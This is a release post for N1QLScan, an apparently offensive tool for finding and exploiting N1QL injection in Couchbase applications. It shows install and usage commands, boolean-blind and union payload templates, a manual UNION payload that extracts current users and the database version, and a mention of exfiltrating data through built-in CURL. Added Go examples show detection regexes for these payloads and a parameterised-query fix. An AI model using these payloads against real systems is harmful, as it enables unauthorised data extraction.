N1QLScan - Release Version 1.0.0

N1QLScan version 1.0.0 has finally been released!!

What is it?

N1QLScan is a tool for automating the detection and exploitation of N1QL injection vulnerabilities. It has undergone many iterations and rewrites, but it has finally been released and can be found at the link below:

N1QLScan

What does it do?

It aims to simplify the detection and exploitation of N1QL injection vulnerabilities, but still allows advanced exploitation through specifying custom payloads.

Usage

Installation

It can be installed directly via the following command:

go install github.com/felsec/n1qlscan@latest

Alternatively, the pre-compiled binaries can be downloaded from the GitHub repo's Releases page.

Modes

N1QLScan has 3 modes:

  1. Scan

This mode takes a URL or request file and scans the available parameters for N1QL injection points. If a vulnerable endpoint is detected, the application determines the injection methods that can be used and generates a test payload for easy confirmation. A vulnerable.data file is also produced, ready for use in the next mode.

  2. Exploit

This mode uses the exploitation methods in the vulnerable.data file to extract the requested data from the Couchbase instance.

It also allows for the exfiltration of data to remote hosts using the built-in CURL functionality.

  3. Manual

This mode, as the name suggests, allows you to perform custom exploitation attempts against applications or to specify advanced payloads.

Running a scan

Running a scan against a target application can either be done by specifying the URL:

n1qlscan scan -u https://vulnerable.app/blog/post?id=123456

Or, by providing a request file:

n1qlscan scan -r ./vulnerable-request

Running n1qlscan scan -h gives you a comprehensive list of all of the options supported by the scan command.

N1QLScan will then go through all of the injection points and attempt to identify any vulnerable parameters, returning the following on a successful scan:

+============================================================+

Query parameter id is vulnerable to Boolean-based Blind N1QL injection
Location: Query parameter
Parameter: id
Detection Method: p1'
Exploit Type: Boolean-based Blind
Example Payload: p1'and'S2LYgiU1'='S2LYgiU1
Payload Template: p1'and<payload>=<check>

+============================================================+
...
+============================================================+

Query parameter id is vulnerable to Union-based N1QL injection
Location: Query parameter
Parameter: id
Detection Method: p1')--
Exploit Type: Union-based
Example Payload: p1'union select'N1QLSCAN'as nickel28)--
Payload Template: p1'union <payload>)--

+============================================================+
...
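The scan output above doubles as a detection signature list for defenders: the Boolean-based blind template (`'and<payload>=<check>`) and the Union-based template (`'union <payload>)--`) are exactly the shapes that show up in web server access logs when a scanner like this one probes an application. The following Go program (an added example, not part of N1QLScan or the original post) parses a few constructed access-log lines, URL-decodes each query parameter, and flags values matching those templates. The log format, the IP addresses and the request lines are all constructed; the payload values are the ones shown in the scan output.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"sort"
)

// Finding records one suspicious parameter value seen in a request log.
type Finding struct {
	Line      int    // 1-based index of the log line
	Param     string // query parameter name
	Value     string // decoded parameter value
	Technique string // which N1QL injection template it matched
}

// Patterns derived from the payload templates reported in the scan output:
//   Boolean-based blind: p1'and<payload>=<check>   e.g. p1'and'X'='X
//   Union-based:         p1'union <payload>)--      e.g. p1'union select'N1QLSCAN'as nickel28)--
// The closing ")--" is also tracked on its own because the detection probe
// (p1')--) uses it without a UNION.
var patterns = []struct {
	name string
	re   *regexp.Regexp
}{
	{"Boolean-based Blind", regexp.MustCompile(`(?i)'\s*and\s*'[^']*'\s*=\s*'`)},
	{"Union-based", regexp.MustCompile(`(?i)'\s*union\s+select\b`)},
	{"Comment terminator", regexp.MustCompile(`\)\s*--`)},
}

// requestLineRe pulls the request target out of a common-log-format line.
var requestLineRe = regexp.MustCompile(`"(?:GET|POST|PUT|DELETE) (\S+) HTTP/[\d.]+"`)

// SampleLog is constructed input in common log format; only the payloads
// come from the scan output above.
var SampleLog = []string{
	`10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /blog/post?id=123456 HTTP/1.1" 200 5120`,
	`10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /blog/post?id=p1%27and%27S2LYgiU1%27%3D%27S2LYgiU1 HTTP/1.1" 200 5120`,
	`10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /blog/post?id=p1%27union%20select%27N1QLSCAN%27as%20nickel28%29-- HTTP/1.1" 200 4870`,
	`10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /blog/post?id=p1%27%29-- HTTP/1.1" 200 4870`,
	`10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "POST /login HTTP/1.1" 302 0`,
}

// ScanLogLine decodes every query parameter in one log line and returns a
// Finding for each (parameter, pattern) pair that matches.
func ScanLogLine(n int, line string) []Finding {
	m := requestLineRe.FindStringSubmatch(line)
	if m == nil {
		return nil
	}
	u, err := url.Parse(m[1])
	if err != nil {
		return nil
	}
	var out []Finding
	for param, values := range u.Query() { // Query() percent-decodes the values
		for _, v := range values {
			for _, p := range patterns {
				if p.re.MatchString(v) {
					out = append(out, Finding{Line: n, Param: param, Value: v, Technique: p.name})
				}
			}
		}
	}
	return out
}

// ScanLog runs ScanLogLine over every line and returns findings in a
// deterministic order (map iteration order in Go is random).
func ScanLog(lines []string) []Finding {
	var all []Finding
	for i, l := range lines {
		all = append(all, ScanLogLine(i+1, l)...)
	}
	sort.Slice(all, func(a, b int) bool {
		if all[a].Line != all[b].Line {
			return all[a].Line < all[b].Line
		}
		if all[a].Param != all[b].Param {
			return all[a].Param < all[b].Param
		}
		return all[a].Technique < all[b].Technique
	})
	return all
}

func main() {
	for _, f := range ScanLog(SampleLog) {
		fmt.Printf("line %d: parameter %q flagged as %s: %s\n", f.Line, f.Param, f.Technique, f.Value)
	}
}
```

The patterns are deliberately narrow so that the noise on a real log is manageable; a value matching two of them in one request (union plus the `)--` terminator) is a stronger signal than either alone, and a burst of hits from one client against one parameter is the scan phase described above.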

At this point we are ready to move onto the next phase.

Exploiting a target

After successfully scanning the target application and identifying a vulnerable parameter, the next step is to run malicious queries to extract the data from the Couchbase instance. This can be done as follows:

URL:

n1qlscan exploit -u https://vulnerable.app/blog/post?id=123456 --get-current-user

Request File:

n1qlscan exploit -r ./vulnerable-request --get-current-user

Running n1qlscan exploit -h gives you a comprehensive list of all of the options supported by the exploit command.

Running a manual attack

When running a manual attack you need to specify the following parts:

  • The target via a URL or request file;
  • The parameter to inject the payload into;
  • The payload to be executed.

n1qlscan manual {--url URL | --request FILE} --payload PAYLOAD --parameter PARAMETER

For example:

n1qlscan manual --url 'http://vulnerable.app/blog/post?id=p1&debug=y' --parameter id --payload "' UNION SELECT raw {\"title\":\"N1QLSCAN\",\"content\":\"injected-\"||CURRENT_USERS()[0],\"id\":DS_VERSION()} )--"

Running n1qlscan manual -h gives you a comprehensive list of all of the options supported by the manual command.
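Every payload on this page works because the application splices the `id` parameter into the N1QL statement text. The Go program below is an added example (not N1QLScan's code and not from the original post) that puts the vulnerable builder beside its hardened form: the safe version keeps the statement constant and binds the value to the named parameter `$id`, which is the same statement/parameters split the Couchbase Go SDK exposes through named parameters in its query options (no SDK is imported here; the `Query` struct is an assumed stand-in). The parentheses around the predicate and the digits-only id format are assumptions chosen to match the `)--` template and the example URL above; the payload is the union probe from the scan output.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// Query is a N1QL statement plus the values bound to its named parameters.
// Statement and Params travel to the query service separately; this is an
// assumed stand-in for the SDK's statement + named-parameters pair.
type Query struct {
	Statement string
	Params    map[string]interface{}
}

// BuildPostQueryVulnerable splices the user-supplied id straight into the
// statement text. The parenthesised predicate is an assumption that matches
// the ")--" payload template reported in the scan output above.
func BuildPostQueryVulnerable(id string) Query {
	return Query{
		Statement: fmt.Sprintf("SELECT title, content FROM blog WHERE (id = '%s')", id),
	}
}

// BuildPostQuerySafe keeps the statement constant and binds id to the named
// parameter $id, so the value is carried as data and never parsed as N1QL.
func BuildPostQuerySafe(id string) Query {
	return Query{
		Statement: "SELECT title, content FROM blog WHERE (id = $id)",
		Params:    map[string]interface{}{"id": id},
	}
}

// postIDFormat is the only shape a post id is expected to have here
// (assumed: decimal digits, as in the example URL ?id=123456).
var postIDFormat = regexp.MustCompile(`^[0-9]{1,12}$`)

// ValidatePostID is a defence-in-depth check applied before any query is
// built; parameterisation is the primary control, this is the second.
func ValidatePostID(id string) error {
	if !postIDFormat.MatchString(id) {
		return errors.New("post id must be 1-12 decimal digits")
	}
	return nil
}

// StatementAltered reports whether the id ended up inside the statement text
// as query syntax, i.e. whether structure and data have been mixed.
func StatementAltered(q Query) bool {
	s := strings.ToLower(q.Statement)
	return strings.Contains(s, "union") || strings.Contains(s, "--")
}

func main() {
	// Constructed input: the union probe N1QLScan reports in its scan output.
	payload := "p1'union select'N1QLSCAN'as nickel28)--"

	v := BuildPostQueryVulnerable(payload)
	fmt.Println("vulnerable statement:", v.Statement)
	fmt.Println("structure altered:   ", StatementAltered(v))

	s := BuildPostQuerySafe(payload)
	fmt.Println("safe statement:      ", s.Statement)
	fmt.Println("bound $id:           ", s.Params["id"])
	fmt.Println("structure altered:   ", StatementAltered(s))

	fmt.Println("validation error:    ", ValidatePostID(payload))
}
```

With the vulnerable builder the `--` in the payload comments out the closing `')`, which is why the template ends with `)--`; with the safe builder the same payload is just an id value that matches no document, and the validator rejects it before a query is ever built.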

Future Developments

As this is the first release, there are lots of areas for improvement and new features that can be added, such as support for obfuscation methods, so keep an eye out for new releases.